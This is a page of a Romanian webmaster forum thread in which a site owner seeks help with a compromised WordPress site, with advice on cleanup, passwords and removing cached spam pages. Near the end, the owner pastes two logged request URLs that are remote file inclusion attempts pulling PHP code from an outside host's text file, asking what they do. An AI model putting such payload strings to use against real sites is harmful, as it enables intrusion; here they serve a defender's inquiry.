Pagina 2 din 3 PrimulPrimul 123 UltimulUltimul
Rezultate 11 la 20 din 28

Subiect: Site infectat

Cristi U este deconectat Super Moderator
    Reputatie:
    53
    Data înscrierii
    26th January 2008
    Locaţie
    Oradea
    Vârstă
    37
    Posturi
    3.172
    Putere Rep
    53

Implicit

Citat Postat în original de deadworldisee Vezi Post
    bai danielu ca fapt divers sunt mai destept ca tine.
    Si sa faci ceva care sa fie indexat in Google si tie sa iti dea not found chiar e usor....

Unde te-a dus gandu....sql injection.....
    OK. Cum o pot gasi ? Sau cum pot repara ?
    Mai dau cate-un sfat juridic aici, uneori chiar despre online. Nu-l rata! :) Vezi și sfaturi de nutritie.

Andrei Luca este deconectat Ambasador
    Reputatie:
    43
    Data înscrierii
    2nd April 2007
    Locaţie
    Iași
    Posturi
    522
    Putere Rep
    43

Implicit

In primul rand instalezi User Agent Switcher pentru Firefox -> Googlebot, ca sa vezi in timp real modificarile pe care le faci.
    Nu iti ramane decat sa iei la "puricat" fisierele, in special cele din wp-content.
    Search in file nu stiu daca ajuta mult, e posibil sa fie generate de la vreun URL criptat.

N-ar strica sa schimbi si parolele de la FTP/Wordpress.
    Ultima modificare făcută de Andrei Luca; 15th February 2009 la 21:33.

Reputatie:
    53
    Data înscrierii
    26th January 2008
    Locaţie
    Oradea
    Vârstă
    37
    Posturi
    3.172
    Putere Rep
    53

Implicit

Citat Postat în original de kis Vezi Post
    In primul rand instalezi User Agent Switcher pentru Firefox -> Googlebot, ca sa vezi in timp real modificarile pe care le faci.
    Nu iti ramane decat sa iei la "puricat" fisierele, in special cele din wp-content.
    Search in file nu stiu daca ajuta mult, e posibil sa fie generate de la vreun URL criptat.

Parolele le-am schimbat deja, dar tare ma tem ca de degeaba momentan, pana nu curat tot. O sa instalez acum ce mi-ai recomandat.
    Mai dau cate-un sfat juridic aici, uneori chiar despre online. Nu-l rata! :) Vezi și sfaturi de nutritie.

Nosfer este deconectat Ambasador
    Reputatie:
    36
    Data înscrierii
    7th July 2008
    Locaţie
    Sibiu
    Vârstă
    39
    Posturi
    1.196
    Putere Rep
    36

Implicit

eu raman la parerea mea: hostingul a fost nesigur. Am patit si eu cu namecheap-ul ceva de genul asta si-mi aparea un <iframe> ciudat in toate index.php-urile, header.php si footer.php de pe server. Am schimbat hostingul, am instalat cele mai noi versiuni de la toate scripturile si am avut grija sa verific toate index.php-urile in parte [un joomla are peste 400 de index.php-uri si au fost MUULTE site-uri cu CMS-ul respectiv pe server]. Dupa ce-am curatat tot, am urcat bazele de date, scripturile curate pe noul hosting si de atunci nu mai e nici o problema...

Cu google cache uita-te din webmaster tools, ca le poti scoate din cache de acolo dar url cu url. Webmaster tools => tools => Remove URLs => Cached copy of a Google search result Remove the cached copy and description of a page that is either outdated or to which you've added a noarchive meta tag.

Danielu este deconectat Membru SeoPedia
    Reputatie:
    34
    Data înscrierii
    22nd April 2008
    Locaţie
    Bucuresti
    Vârstă
    39
    Posturi
    572
    Putere Rep
    34

Implicit

Citat Postat în original de Nosfer Vezi Post
    Cu google cache uita-te din webmaster tools, ca le poti scoate din cache de acolo dar url cu url. Webmaster tools => tools => Remove URLs => Cached copy of a Google search result Remove the cached copy and description of a page that is either outdated or to which you've added a noarchive meta tag.
    Cred ca are vreo 5-10k de scos url cu url
    Chiar daca in cache apar 1200 ele sunt mai multe si cum dispar unele apar altele. Smart virus
    Retete de prajituri pentru toate gusturile -> Retete prajituri

Reputatie:
    53
    Data înscrierii
    26th January 2008
    Locaţie
    Oradea
    Vârstă
    37
    Posturi
    3.172
    Putere Rep
    53

Implicit

Citat Postat în original de kis Vezi Post

Esti un inger Se pare ca era de la porcaria de plug in holly dolly, care a venit preinstalat cu versiunea 2.5 daca nu ma insel. Habar n-am cum era exploatat, insa cert e ca dupa ce l-am sters au disparut porcariile alea.

Multumesc

deadworldisee este deconectat Membru SeoPedia
    Reputatie:
    36
    Data înscrierii
    6th April 2008
    Locaţie
    iasi
    Vârstă
    38
    Posturi
    1.034
    Putere Rep
    36

Implicit

Deci am avut dreptate ca e de la wordpress si nu host.....

Nosfer chestia cu iframe se cheama trojan iframe/trojan clicker.E un virus pe calcul tau care infecteaza fisierele cu nume index.In momentul cand ai deschisa o conexiune ftp/sftp iti viruseaza si acele fisiere de pe host.

Reputatie:
    53
    Data înscrierii
    26th January 2008
    Locaţie
    Oradea
    Vârstă
    37
    Posturi
    3.172
    Putere Rep
    53

Implicit

Daca te uiti, eu n-am zis niciodata ca ar fi de la host

Tocmai mi-am instalat plug in-ul http://www.wpwp.org/
    si am aruncat o provire peste spideri si alte porcarii si am gasit ceva extrem de ciudat:
    Cod PHP:
    http://www.pariuri.org/?autoLoadConfig9990autoType=include&autoLoadConfig9990loadFile=http://www.cohul.net/chid.txt???
    http://www.pariuri.org/?option=com_contact&Itemid=3//index.php?autoLoadConfig9990autoType=include&autoLoadConfig9990loadFile=http://www.cohul.net/chid.txt??? 
    iar la fisierul ala txt este un cod php... Pentru mine e prima data cand ma lovesc de asemenea porcarii... N-am observat nicio modifcare la site dupa asta... posibil sa fi esuat in ceea ce a vrut sa faca. Poate sa imi spuna cineva ce a vrut sa faca, sau ce a facut?

dcosmin83 este deconectat Membru SeoPedia
    Reputatie:
    34
    Data înscrierii
    28th October 2007
    Locaţie
    Romania
    Vârstă
    42
    Posturi
    383
    Putere Rep
    34

Implicit

legat de parolele ftp , generati o parola din cpanel sa fie cat mai complicata din > 12 carcatere

momentan aceasta este una dintre cele mai mari pb online la care nu s-a gasit o solutie clara

avita salvarea parolelor in softurile de conectare la ftp
    La SILKWEB avem o platforma e-commerce si iti poti face un audit seo gratuit

Reputatie:
    53
    Data înscrierii
    26th January 2008
    Locaţie
    Oradea
    Vârstă
    37
    Posturi
    3.172
    Putere Rep
    53

Implicit

Nah, nu stie nimeni despre ce este vorba in linkurile pe care le-am dat in postul anterior?

Pagina 2 din 3 PrimulPrimul 123 UltimulUltimul

Informații subiect

Utilizatori care navighează în acest subiect

Momentan este/sunt 1 utilizator(i) care navighează în acest subiect. (0 membrii și 1 vizitatori)

Permisiuni postare

• Nu puteţi posta subiecte noi.
  • Nu puteţi răspunde la subiecte
  • Nu puteţi adăuga ataşamente
  • Nu puteţi modifica posturile proprii
  •